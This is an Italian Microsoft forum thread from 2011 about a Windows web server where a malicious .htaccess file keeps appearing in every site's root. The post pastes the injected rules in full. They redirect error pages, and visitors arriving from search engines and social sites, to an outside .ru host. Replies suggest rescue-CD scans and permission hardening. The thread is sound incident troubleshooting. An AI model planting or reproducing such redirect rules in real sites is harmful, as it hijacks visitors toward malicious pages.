Con più domande
Virus .htaccess

Discussione generale
-
Ciao a tutti, ho un problema strano su una macchina windows 2008 web server, in pratica si crea automaticamente un file .htaccess in ogni cartella root dei siti ospitati. Facendo una scansione con un antivirus (AVG) ha rilevato dei worm in un sito realizzato con Zencart. Sistemato questo sito (aggiornandolo all’ultima versione di Zen, cambiato i dati di acesso etc), il problema non si è risolto, ogni 2/3 giorni compare quel maledetto file .htaccess (di cui copio il contenuto sotto, ma varia ogni volta), sempre e solo nella root, come cacchio fa? L'antivirus non trova nulla di strano, i vari settaggi sono apposto e non so piu' dove cercare, qualcuno può aiutarmi?
RewriteEngine On ErrorDocument
400 http://restileyear.ru/in.cgi?16 ErrorDocument01 http://restileyear.ru/in.cgi?16 ErrorDocument 403 http://restileyear.ru/in.cgi?16 ErrorDocument 404 http://restileyear.ru/in.cgi?16 ErrorDocument 500 http://restileyear.ru/in.cgi?16 RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://restileyear.ru/in.cgi?16 [R=301,L]
- Tipo modificato Fabrizio Volpe martedì 15 febbraio 2011 11:06 Mancato feedback utente
Tutte le risposte
-
scarica questo
http://www.avira.com/en/support-download-avira-antivir-rescue-system
masterizzalo, fai il boot del server con questo dvd ed esegui una scansione completa.
ciao.
Edoardo Benussi - Microsoft® MVP
Management Infrastructure - Systems Administration
https://mvp.support.microsoft.com/Profile/Benussi
Windows Server Italian Forum Moderator
edo[at]mvps[dot]org -
scarica questo
http://www.avira.com/en/support-download-avira-antivir-rescue-system
masterizzalo, fai il boot del server con questo dvd ed esegui una
scansione completa.Aggiungo (per buona misura, non perchè il CD di cui sopra non
vada bene)http://www.f-secure.com/en_EMEA-Labs/security-threats/tools/rescue-cd/
le istruzioni sono le stesse (masterizza, boot...) cambiano invece
il motore di scansione e le firme (F-Secure); di nuovo, non che il
CD di Avira non funzioni, ma a volte un "secondo parere" non fa
male :) -
-
Grazie per le risposte, domani provo prima con
Avira e se il caso con F-secure.Speriamo che trovano qualcosa perchè Avg
non vede nulla.A prescindere da giudizi su AVG o altro, di norma la
prima cosa che fa un malware è quella di nascondersi
a qualsivoglia AV in esecuzione sul sistema, questo
significa che, tentare di pulire un sistema infetto ... dal
sistema stesso è, spesso, del tutto inutile e non porta
ad alcun risultato; in questi casi è MOLTO meglio usare
un boot CD (come ad esempio quelli consigliati) per
avviare il sistema lasciando l'OS infetto "dormiente"
ed in tal modo essere in grado di effettuare una reale
scansione (e pulizia) dello stessociao
-
Purtroppo ho provato a fare una scansione completa con Avira facendo un boot da CD, ma non ha trovato nulla di strano come immaginavo, è un po' difficile trovare un virus "Vero" in un server web, ma andando ad esclusione questo tentativo andava fatto.
Praticamente il problema è partito quasi sicuramente da quella versione di Zencart non aggiornata, (era un noto bug che è stato sfruttato dove l'attaccante ha creato delle backdoor tipo ghdd.php nella cartella immagine di tale sito), oppure qualche accesso FTP rubato (difficile perché le password sono abbastanza robuste) , oppure qualche computer infetto di chi si collegava via FTP al suo sito.
Presi tutti i provvedimenti del caso, cioè aggiornato Zen, cambiare password FTP dei siti sospetti etc. non so cosa altro pensare, come fa a scrivere quel file nelle root dei siti, soprattutto a tutti i siti ? Per ora ho eliminato i permessi di scrittura all'utente users (aveva permessi di scrittura nella Autorizzazioni speciali in tutta la cartella dove sono i siti).
Se la mia teoria è giusta, il sito o i siti infettati, ora che non ci sono piu' i permessi di scrittura, dovrebbero poter scrivere solo dove hanno i dati di accesso e non a tutti, in tal caso sarebbe fatta perché, se si crea il file sospetto solo in un sito allora è sicuro che è quello il problema.
Ovviamente se avete suggerimenti sono piu' che graditi...
-
puoi mandarmi alla casella mail in firma il log di hijackthis ?
Edoardo Benussi - Microsoft® MVP
Management Infrastructure - Systems Administration
https://mvp.support.microsoft.com/Profile/Benussi
Windows Server Italian Forum Moderator
edo[at]mvps[dot]org -
ho visto il log ma in quello non viene segnalato nulla.
mi puoi dire cosa c'è nei siti web pubblicati da questo web server ? siti scritti con quale tecnologia ?
Edoardo Benussi - Microsoft® MVP
Management Infrastructure - Systems Administration
https://mvp.support.microsoft.com/Profile/Benussi
Windows Server Italian Forum Moderator
edo[at]mvps[dot]org -
Ho modificato questo thread in "Discussione" visti i tempi trascorsi.
Restiamo a disposizione se il problema fosse ancora non risolto o per conoscere la soluzione eventualmente applicata.
Fabrizio Volpe
MVP Directory Services
MCSE (NT4)(2000)(2003) - MCSA (2003)
MCTS (SQL 2005)(Exchange 2007)(Windows 2008)
Fortinet Certified Network Security Professional (FCNSP)
Fabrizio[_dot_]Volpe[_at_]GMX[_dot_]com